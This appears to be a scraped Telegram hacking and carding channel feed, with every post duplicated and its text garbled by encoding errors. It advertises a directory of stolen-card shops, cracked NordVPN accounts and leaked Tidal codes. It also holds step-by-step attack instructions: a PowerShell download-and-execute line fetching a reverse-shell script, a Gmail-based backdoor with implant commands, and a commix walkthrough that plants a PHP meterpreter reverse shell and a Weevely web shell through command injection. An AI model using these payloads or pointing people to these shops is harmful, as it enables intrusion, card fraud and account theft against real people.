π¦X 90 WORKING PREM NORDVPN- HAVE TROUBLE LOGIN DM FOR PRIVATE ONE @UndercodePosts
pastebin.com/rBjn17Au
pastebin.com/rBjn17Au
Pastebin
X90 WORKING NORDVPN PREMIUM @UNDERCODEtesting - Pastebin.com
Forwarded from TARJETAS PRO UNDER CARDING
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from TARJETAS PRO UNDER CARDING
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from TARJETAS PRO UNDER CARDING
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from TARJETAS PRO UNDER CARDING
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ CARDING : -All CC shop sites list.....
T.me/undercodeTesting
jshop-pro.cc = Only us cc
cvv.me
ltdcc1.ru
dumps.su
ug4all.ru = SCAM
2pac.cc
pp24.cc = BAN YOUR ACCOUNT WITHOUT ANY REASON
feshop-card.ru
uniccshop.ru = Reselling Cc On 6 -7 Different Shop !
torcvv.cc
validshop.succstore.su
approved1.su
approved1.ru = SCAM
autocvv.net = SCAM
backstab.su = SCAM
bestbins.ru = SCAM
bstab.net
buyst0re.bz
c2v2.net
carderpro.com
cardersbay.in
cardrock.su = SCAM
cardrockcafe.cc
cardsmarket.su
cardstorm.ru
ccbase.biz
ccbases.com
ccbases.net
ccbases.su
ccchecker.ru
ccdumb.cc
ccnall.com = SCAM
ccv.name
ccvalid.su = SCAM
cheapdumps.so = SCAM
consuella.su = SCAM
crdsu.name = SCAM
cvv-shop.ru
cvv-store.su
cvv4you.su = SCAM
cvvseller.pro
cvvshop.lv
cvvshop.net
cvvshop.su
cvvshop1.com
cvvshop1.lv = Uniccshop
cvvshop1.ru
cvvstore.ru = Uniccshop
d4rksys.cc
dnums.su = SCAM
dumps44.cc
dumps44.com = SCAM
dumps4rise.com = SCAM
dumpscheck.us
dumpsgate.su
feshop.su = SCAM
freshbase.org
fullz.pro
galaxycvv.com = SCAM
galaxycvv.ru
galaxycvv.su
greatdumps.cc
greatdumps.su
greatdumpz.su
hackedcvv.su
instantcvv.ru
jbestcc.ru
jshop.su = SCAM
justvalid.ru = SCAM
jworldtopcc.ru = SCAM
kaddafi.hk = SCAM
kidala.info
kingscard.ru
kingscard.su
lampeduza.su
logoshopcc.net
ltdcc.cc
maza.su = SCAM
n1shop.su
nonvbv.com
nonvbv.ru
nonvbv.su
octavian.su
omerta.cc
pentagon.al
pirates-cc.com
pirates-cc.ru
pompei.su
procvvshop.ru
project84.su
rafanji.com
rescator.ru
rescator.so
rescator.su
reskator.la
secinfo.su
secretshop.su
selldump.su
shop-cvv.ru
shopcvv.ru
slilpp.net
source4dumps.cc
sruka.su
ssnfinder.su
swiped.ru
t12shop.cc
thefreshcc.com
thefreshdumps.com
torcvv.com
track2shop.com
trackmarket.pro
uniccshop.su
uniccshops.ru
v-m.name
validcard.org
validcvv.ru
validcvv.su
validdumps.su
validshop.su
verified.cm
vipcvv.net = SCAM
worldcvv.com
worldcvv.ru
buyacc.us
l33t.su
sruka.cc
teentc.net = SCAM
bigbase1.lv = Uniccshop
by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ CARDING : -All CC shop sites list.....
T.me/undercodeTesting
jshop-pro.cc = Only us cc
cvv.me
ltdcc1.ru
dumps.su
ug4all.ru = SCAM
2pac.cc
pp24.cc = BAN YOUR ACCOUNT WITHOUT ANY REASON
feshop-card.ru
uniccshop.ru = Reselling Cc On 6 -7 Different Shop !
torcvv.cc
validshop.succstore.su
approved1.su
approved1.ru = SCAM
autocvv.net = SCAM
backstab.su = SCAM
bestbins.ru = SCAM
bstab.net
buyst0re.bz
c2v2.net
carderpro.com
cardersbay.in
cardrock.su = SCAM
cardrockcafe.cc
cardsmarket.su
cardstorm.ru
ccbase.biz
ccbases.com
ccbases.net
ccbases.su
ccchecker.ru
ccdumb.cc
ccnall.com = SCAM
ccv.name
ccvalid.su = SCAM
cheapdumps.so = SCAM
consuella.su = SCAM
crdsu.name = SCAM
cvv-shop.ru
cvv-store.su
cvv4you.su = SCAM
cvvseller.pro
cvvshop.lv
cvvshop.net
cvvshop.su
cvvshop1.com
cvvshop1.lv = Uniccshop
cvvshop1.ru
cvvstore.ru = Uniccshop
d4rksys.cc
dnums.su = SCAM
dumps44.cc
dumps44.com = SCAM
dumps4rise.com = SCAM
dumpscheck.us
dumpsgate.su
feshop.su = SCAM
freshbase.org
fullz.pro
galaxycvv.com = SCAM
galaxycvv.ru
galaxycvv.su
greatdumps.cc
greatdumps.su
greatdumpz.su
hackedcvv.su
instantcvv.ru
jbestcc.ru
jshop.su = SCAM
justvalid.ru = SCAM
jworldtopcc.ru = SCAM
kaddafi.hk = SCAM
kidala.info
kingscard.ru
kingscard.su
lampeduza.su
logoshopcc.net
ltdcc.cc
maza.su = SCAM
n1shop.su
nonvbv.com
nonvbv.ru
nonvbv.su
octavian.su
omerta.cc
pentagon.al
pirates-cc.com
pirates-cc.ru
pompei.su
procvvshop.ru
project84.su
rafanji.com
rescator.ru
rescator.so
rescator.su
reskator.la
secinfo.su
secretshop.su
selldump.su
shop-cvv.ru
shopcvv.ru
slilpp.net
source4dumps.cc
sruka.su
ssnfinder.su
swiped.ru
t12shop.cc
thefreshcc.com
thefreshdumps.com
torcvv.com
track2shop.com
trackmarket.pro
uniccshop.su
uniccshops.ru
v-m.name
validcard.org
validcvv.ru
validcvv.su
validdumps.su
validshop.su
verified.cm
vipcvv.net = SCAM
worldcvv.com
worldcvv.ru
buyacc.us
l33t.su
sruka.cc
teentc.net = SCAM
bigbase1.lv = Uniccshop
by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2019-2020 updated
> PowerShell for red team,FOR penetration testing:
t.me/UndercodeTesting
π¦ πβπππΈπππππΈπππβ & βπβ :
1)clone or download zip
> git clone https://github.com/samratashok/nishang
2) Import all the scripts in the current PowerShell session (PowerShell v3 onwards).
> PS C:\nishang> Import-Module .\nishang.psm1
3) Use the individual scripts with dot sourcing.
PS C:\nishang> . C:\nishang\Gather\Get-Information.ps1
PS C:\nishang> Get-Information
4) To get help about any script or function, use:
PS C:\nishang> Get-Help [scriptname] -full
5) Note that the help is available for the function loaded after running the script and not the script itself since version 0.3.8. In all cases, the function name is same as the script name.
6) For example, to see the help about Get-WLAN-Keys.ps1, use
PS C:\nishang> . C:\nishang\Get-WLAN-Keys.ps1
PS C:\nishang> Get-Help Get-WLAN-Keys -Full
π¦ Anti Virus
1) Nishang scripts are flagged by many Anti Viruses as malicious. The scrripts on a target are meant to be used in memory which is very easy to do with PowerShell. Two basic methods to execute PowerShell scripts in memory:
> Method . Use the in-memory dowload and execute: Use below command to execute a PowerShell script from a remote shell, meterpreter native shell, a web shell etc. and the function exported by it. All the scripts in Nishang export a function with same name in the current PowerShell session.
powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShell
β Tested by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2019-2020 updated
> PowerShell for red team,FOR penetration testing:
t.me/UndercodeTesting
π¦ πβπππΈπππππΈπππβ & βπβ :
1)clone or download zip
> git clone https://github.com/samratashok/nishang
2) Import all the scripts in the current PowerShell session (PowerShell v3 onwards).
> PS C:\nishang> Import-Module .\nishang.psm1
3) Use the individual scripts with dot sourcing.
PS C:\nishang> . C:\nishang\Gather\Get-Information.ps1
PS C:\nishang> Get-Information
4) To get help about any script or function, use:
PS C:\nishang> Get-Help [scriptname] -full
5) Note that the help is available for the function loaded after running the script and not the script itself since version 0.3.8. In all cases, the function name is same as the script name.
6) For example, to see the help about Get-WLAN-Keys.ps1, use
PS C:\nishang> . C:\nishang\Get-WLAN-Keys.ps1
PS C:\nishang> Get-Help Get-WLAN-Keys -Full
π¦ Anti Virus
1) Nishang scripts are flagged by many Anti Viruses as malicious. The scrripts on a target are meant to be used in memory which is very easy to do with PowerShell. Two basic methods to execute PowerShell scripts in memory:
> Method . Use the in-memory dowload and execute: Use below command to execute a PowerShell script from a remote shell, meterpreter native shell, a web shell etc. and the function exported by it. All the scripts in Nishang export a function with same name in the current PowerShell session.
powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShell
β Tested by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ TIDAL PREMIUM Verified β
pinterest.com/Undercode_Testing
@undercodeTesting Code = MMXV7ESYGC | Expiration = 2020-05-12
@undercodeTesting Code = 7AQGZ4XMUA | Expiration = 2020-05-12
@undercodeTesting Code = B6JXZVNG9R | Expiration = 2020-05-12
@undercodeTesting Code = TLSJCBGHWV | Expiration = 2020-05-12
@undercodeTesting Code = LDHYJEV8H2 | Expiration = 2020-05-12
@undercodeTesting Code = NWNFYXJXZ2 | Expiration = 2020-05-12
@undercodeTesting Code = 4W46G8VVQV | Expiration = 2020-05-12
@undercodeTesting Code = PAN2CSP3WP | Expiration = 2020-05-12
@undercodeTesting Code = A9FPMBY3V3 | Expiration = 2020-05-12
@undercodeTesting Code = ABYNU8PXKQ | Expiration = 2020-05-12
@undercodeTesting Code = BPK6JFTUSS | Expiration = 2020-05-12
@undercodeTesting Code = E5L4ZQ3RRG | Expiration = 2020-05-12
@undercodeTesting Code = 4DMPWCEFPZ | Expiration = 2020-05-12
@undercodeTesting Code = TL6UNHYNQB | Expiration = 2020-05-12
@undercodeTesting Code = FTPGVNKAWG | Expiration = 2020-05-12
@undercodeTesting Code = XSGSVTC8KT | Expiration = 2020-05-12
@undercodeTesting Code = P4LLF5N5YS | Expiration = 2020-05-12
@undercodeTesting Code = YG2AHB8KRH | Expiration = 2020-05-12
@undercodeTesting Code = E8DRRZ6LJ6 | Expiration = 2020-05-12
@undercodeTesting Code = C5AFA6M9FL | Expiration = 2020-05-12
@undercodeTesting Code = 55K6C4QF65 | Expiration = 2020-05-12
@undercodeTesting Code = KF2JYNCYP8 | Expiration = 2020-05-12
@undercodeTesting Code = USFJ8L3WW9 | Expiration = 2020-05-12
@undercodeTesting Code = B8HCCKNZXT | Expiration = 2020-05-12
@undercodeTesting Code = YPVS2UWEZC | Expiration = 2020-05-12
@undercodeTesting Code = QZ8LNY6JGD | Expiration = 2020-05-12
@undercodeTesting Code = 8MBTUYFN9A | Expiration = 2020-05-12
@undercodeTesting Code = ZJZPPVZ4MP | Expiration = 2020-05-12
@undercodeTesting Code = SYSF9F55JC | Expiration = 2020-05-12
@undercodeTesting Code = PM5ZJVAGR2 | Expiration = 2020-05-12
@undercodeTesting Code = 3LZ8S3MVCW | Expiration = 2020-05-12
@undercodeTesting Code = NGTWUB5FPU | Expiration = 2020-05-12
@undercodeTesting Code = QB4DKPZKPE | Expiration = 2020-05-12
@undercodeTesting Code = H49Z7GP79J | Expiration = 2020-05-12
@undercodeTesting Code = 4K3CPYRTE7 | Expiration = 2020-05-12
@undercodeTesting Code = 7XAAFVJ7QV | Expiration = 2020-05-12
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ TIDAL PREMIUM Verified β
pinterest.com/Undercode_Testing
@undercodeTesting Code = MMXV7ESYGC | Expiration = 2020-05-12
@undercodeTesting Code = 7AQGZ4XMUA | Expiration = 2020-05-12
@undercodeTesting Code = B6JXZVNG9R | Expiration = 2020-05-12
@undercodeTesting Code = TLSJCBGHWV | Expiration = 2020-05-12
@undercodeTesting Code = LDHYJEV8H2 | Expiration = 2020-05-12
@undercodeTesting Code = NWNFYXJXZ2 | Expiration = 2020-05-12
@undercodeTesting Code = 4W46G8VVQV | Expiration = 2020-05-12
@undercodeTesting Code = PAN2CSP3WP | Expiration = 2020-05-12
@undercodeTesting Code = A9FPMBY3V3 | Expiration = 2020-05-12
@undercodeTesting Code = ABYNU8PXKQ | Expiration = 2020-05-12
@undercodeTesting Code = BPK6JFTUSS | Expiration = 2020-05-12
@undercodeTesting Code = E5L4ZQ3RRG | Expiration = 2020-05-12
@undercodeTesting Code = 4DMPWCEFPZ | Expiration = 2020-05-12
@undercodeTesting Code = TL6UNHYNQB | Expiration = 2020-05-12
@undercodeTesting Code = FTPGVNKAWG | Expiration = 2020-05-12
@undercodeTesting Code = XSGSVTC8KT | Expiration = 2020-05-12
@undercodeTesting Code = P4LLF5N5YS | Expiration = 2020-05-12
@undercodeTesting Code = YG2AHB8KRH | Expiration = 2020-05-12
@undercodeTesting Code = E8DRRZ6LJ6 | Expiration = 2020-05-12
@undercodeTesting Code = C5AFA6M9FL | Expiration = 2020-05-12
@undercodeTesting Code = 55K6C4QF65 | Expiration = 2020-05-12
@undercodeTesting Code = KF2JYNCYP8 | Expiration = 2020-05-12
@undercodeTesting Code = USFJ8L3WW9 | Expiration = 2020-05-12
@undercodeTesting Code = B8HCCKNZXT | Expiration = 2020-05-12
@undercodeTesting Code = YPVS2UWEZC | Expiration = 2020-05-12
@undercodeTesting Code = QZ8LNY6JGD | Expiration = 2020-05-12
@undercodeTesting Code = 8MBTUYFN9A | Expiration = 2020-05-12
@undercodeTesting Code = ZJZPPVZ4MP | Expiration = 2020-05-12
@undercodeTesting Code = SYSF9F55JC | Expiration = 2020-05-12
@undercodeTesting Code = PM5ZJVAGR2 | Expiration = 2020-05-12
@undercodeTesting Code = 3LZ8S3MVCW | Expiration = 2020-05-12
@undercodeTesting Code = NGTWUB5FPU | Expiration = 2020-05-12
@undercodeTesting Code = QB4DKPZKPE | Expiration = 2020-05-12
@undercodeTesting Code = H49Z7GP79J | Expiration = 2020-05-12
@undercodeTesting Code = 4K3CPYRTE7 | Expiration = 2020-05-12
@undercodeTesting Code = 7XAAFVJ7QV | Expiration = 2020-05-12
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Pinterest
UnderCode TESTING (UNDERCODE_TESTING) on Pinterest
UnderCode TESTING | πππππ£βπ ππ πππ€π₯πππ βπ ππ‘πππͺ:
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 updated Linux installer for termux
t.me/UndercodeTesting
π¦ πβπππΈπππππΈπππβ & βπβ :
1)open termux and type
> echo "deb [trusted=yes arch=all] https://yadominjinta.github.io/files/ termux extras" >> $PREFIX/etc/apt/sources.list
pkg in atilo
> https://github.com/YadominJinta/atilo
2)
Atilo is a program to help you install some GNU/Linux distributions on Termux.
Commands:
images list available images
remove remove installed images
pull pulling an image
run run an image
clean clean tmps
help show this help.
π¦ OS :
Distribution aarch64 arm x86_64 i686
Arch β β Γ Γ
Alpine β β β β
CentOS β Γ β Γ
Debian β β β β
Fedora β Γ β Γ
Kali β β β β
openSUSE β β Γ Γ
Ubuntu β β β β
Ubuntu LTS β β β β
β Verified
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 updated Linux installer for termux
t.me/UndercodeTesting
π¦ πβπππΈπππππΈπππβ & βπβ :
1)open termux and type
> echo "deb [trusted=yes arch=all] https://yadominjinta.github.io/files/ termux extras" >> $PREFIX/etc/apt/sources.list
pkg in atilo
> https://github.com/YadominJinta/atilo
2)
Atilo is a program to help you install some GNU/Linux distributions on Termux.
Commands:
images list available images
remove remove installed images
pull pulling an image
run run an image
clean clean tmps
help show this help.
π¦ OS :
Distribution aarch64 arm x86_64 i686
Arch β β Γ Γ
Alpine β β β β
CentOS β Γ β Γ
Debian β β β β
Fedora β Γ β Γ
Kali β β β β
openSUSE β β Γ Γ
Ubuntu β β β β
Ubuntu LTS β β β β
β Verified
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦tOP WEBSITEs FOR Earn Bitcoin- Cryptocurrency
T.me/UndercodeTesting
https://minergate.com/
https://www.bitcoinget.com/
https://coinbucks.io/
bitcoin.com also free btc
http://cointiply.com/r/LBVeJ
https://octoin.com/6182045928OCC
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦tOP WEBSITEs FOR Earn Bitcoin- Cryptocurrency
T.me/UndercodeTesting
https://minergate.com/
https://www.bitcoinget.com/
https://coinbucks.io/
bitcoin.com also free btc
http://cointiply.com/r/LBVeJ
https://octoin.com/6182045928OCC
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦A PoC backdoor that uses Gmail as a C&C server
> A Gmail account (Use a dedicated account! Do not use your personal one!)
> Turn on "Allow less secure apps" under the security settings of the account
> You may also have to enable IMAP in the account settings
π¦ πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/byt3bl33d3r/gcat
2) cd gcat
3) run as python implant.py
π¦ Once you've deployed the backdoor on a couple of systems, you can check available clients using the list command:
#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86
The output is a UUID string that uniquely identifies the system and the
> OS the implant is running on
Let's issue a command to an implant:
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv
Here we are telling 90b2cd83-cb36-52de-84ee-99db6ff41a11 to execute ipconfig /all, the script then outputs the jobid that we can use to retrieve the output of that command
> Lets get the results!
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'
π¦ Windows IP Configuration
Host Name . . . . . . . . . . . . : unknown-2d44b52
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦A PoC backdoor that uses Gmail as a C&C server
> A Gmail account (Use a dedicated account! Do not use your personal one!)
> Turn on "Allow less secure apps" under the security settings of the account
> You may also have to enable IMAP in the account settings
π¦ πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/byt3bl33d3r/gcat
2) cd gcat
3) run as python implant.py
π¦ Once you've deployed the backdoor on a couple of systems, you can check available clients using the list command:
#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86
The output is a UUID string that uniquely identifies the system and the
> OS the implant is running on
Let's issue a command to an implant:
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv
Here we are telling 90b2cd83-cb36-52de-84ee-99db6ff41a11 to execute ipconfig /all, the script then outputs the jobid that we can use to retrieve the output of that command
> Lets get the results!
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'
π¦ Windows IP Configuration
Host Name . . . . . . . . . . . . : unknown-2d44b52
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 new update Automated All-in-One OS command injection and exploitation tool- for any linux os
t.me/undercodeTesting
π¦ πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/commixproject/commix.git
2) cd commix
3) run python setup.py
π¦ Create the PHP meterpreter shell (via msfvenom)
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.178.3 LPORT=4444 -e php/base64 -f raw > /root/Desktop/msfvenom.php
Note: Don't forget to add <?php and ?> in to msfvenom.php file
Step 2: Start the handler (via msfconsole)
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.178.3
LHOST => 192.168.178.3
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.178.3:4444
[*] Starting the payload handler...
Step 3: Use commix to create "msfvenom.php" file on target's "/var/www/" directory and execute it.
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cmd/normal.php?addr=INJECT_HERE" --file-write="/root/Desktop/msfvenom.php" --file-dest="/var/www/msfvenom.php" --os-cmd="php -f /var/www/msfvenom.php"
Step 4: Enjoy your shell!
[*] Sending stage (40499 bytes) to 192.168.178.4
[*] Meterpreter session 1 opened (192.168.178.3:4444 -> 192.168.178.4:50450) at 2015-05-16 03:11:42 -0400
meterpreter > sysinfo
Computer : debian
OS : Linux debian 3.16.0-4-586 #1 Debian 3.16.7-ckt9-3~deb8u1 (2015-04-24) i686
Meterpreter : php/php
meterpreter >
2. Upload a Weevely PHP web shell on target host.
Step 1 : Create the PHP web shell.
weevely generate commix
[generate.php] Backdoor file 'weevely.php' created with password 'commix'
Step 2 : Use commix to create "weevely.php" file on target's "var/www/html/cmd/" directory.
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cmd/normal.php?addr=INJECT_HERE" --file-write="/root/Desktop/weevely.php" --file-dest="/var/www/html/cmd/"
Step 3 : Enjoy your shell!
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 new update Automated All-in-One OS command injection and exploitation tool- for any linux os
t.me/undercodeTesting
π¦ πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/commixproject/commix.git
2) cd commix
3) run python setup.py
π¦ Create the PHP meterpreter shell (via msfvenom)
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.178.3 LPORT=4444 -e php/base64 -f raw > /root/Desktop/msfvenom.php
Note: Don't forget to add <?php and ?> in to msfvenom.php file
Step 2: Start the handler (via msfconsole)
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.178.3
LHOST => 192.168.178.3
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.178.3:4444
[*] Starting the payload handler...
Step 3: Use commix to create "msfvenom.php" file on target's "/var/www/" directory and execute it.
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cmd/normal.php?addr=INJECT_HERE" --file-write="/root/Desktop/msfvenom.php" --file-dest="/var/www/msfvenom.php" --os-cmd="php -f /var/www/msfvenom.php"
Step 4: Enjoy your shell!
[*] Sending stage (40499 bytes) to 192.168.178.4
[*] Meterpreter session 1 opened (192.168.178.3:4444 -> 192.168.178.4:50450) at 2015-05-16 03:11:42 -0400
meterpreter > sysinfo
Computer : debian
OS : Linux debian 3.16.0-4-586 #1 Debian 3.16.7-ckt9-3~deb8u1 (2015-04-24) i686
Meterpreter : php/php
meterpreter >
2. Upload a Weevely PHP web shell on target host.
Step 1 : Create the PHP web shell.
weevely generate commix
[generate.php] Backdoor file 'weevely.php' created with password 'commix'
Step 2 : Use commix to create "weevely.php" file on target's "var/www/html/cmd/" directory.
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cmd/normal.php?addr=INJECT_HERE" --file-write="/root/Desktop/weevely.php" --file-dest="/var/www/html/cmd/"
Step 3 : Enjoy your shell!
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦New 2020 deepweb .onion for > Blogs
http://74ypjqjwf6oejmax.onion/ β Beneath VT β Exploring Virginia Techβs Steam Tunnels and Beyond
http://76qugh5bey5gum7l.onion/ β Deep Web Radio
http://edramalpl7oq5npk.onion/Main_Page β Encyclopedia Dramatica
http://ih4pgsz3aepacbwl.onion/ β Hushbox
http://ad52wtwp2goynr3a.onion/# β Dark Like My Soul
http://tns7i5gucaaussz4.onion/ β FreeFor
http://gdkez5whqhpthb4d.onion/ β Scientology Archive
http://newsiiwanaduqpre.onion/ β All the latest news for tor
http://5vppavyzjkfs45r4.onion/ β Michael Blizek
http://7ueo7ahq2xlpwx7q.onion/ β AYPSELA News
http://7hk64iz2vn2ewi7h.onion/ β Blog about Stories
http://tigas3l7uusztiqu.onion/ β Mike Tigas
http://mpf3i4k43xc2usxj.onion/ β Sam Whited
http://7w2rtz7rgfwj5zuv.onion/ β An Open Letter to Revolutionaries
http://3c3bdbvhb7j6yab2.onion/ β Totse 2
http://4fvfamdpoulu2nms.onion/ β Lucky Eddieβs Home
http://nwycvryrozllb42g.onion/searchlores/index.htm β Fraviaβs Web Searching Lore
http://newsiiwanaduqpre.onion/ β OnionNews β Blog about the onionland
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦New 2020 deepweb .onion for > Blogs
http://74ypjqjwf6oejmax.onion/ β Beneath VT β Exploring Virginia Techβs Steam Tunnels and Beyond
http://76qugh5bey5gum7l.onion/ β Deep Web Radio
http://edramalpl7oq5npk.onion/Main_Page β Encyclopedia Dramatica
http://ih4pgsz3aepacbwl.onion/ β Hushbox
http://ad52wtwp2goynr3a.onion/# β Dark Like My Soul
http://tns7i5gucaaussz4.onion/ β FreeFor
http://gdkez5whqhpthb4d.onion/ β Scientology Archive
http://newsiiwanaduqpre.onion/ β All the latest news for tor
http://5vppavyzjkfs45r4.onion/ β Michael Blizek
http://7ueo7ahq2xlpwx7q.onion/ β AYPSELA News
http://7hk64iz2vn2ewi7h.onion/ β Blog about Stories
http://tigas3l7uusztiqu.onion/ β Mike Tigas
http://mpf3i4k43xc2usxj.onion/ β Sam Whited
http://7w2rtz7rgfwj5zuv.onion/ β An Open Letter to Revolutionaries
http://3c3bdbvhb7j6yab2.onion/ β Totse 2
http://4fvfamdpoulu2nms.onion/ β Lucky Eddieβs Home
http://nwycvryrozllb42g.onion/searchlores/index.htm β Fraviaβs Web Searching Lore
http://newsiiwanaduqpre.onion/ β OnionNews β Blog about the onionland
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β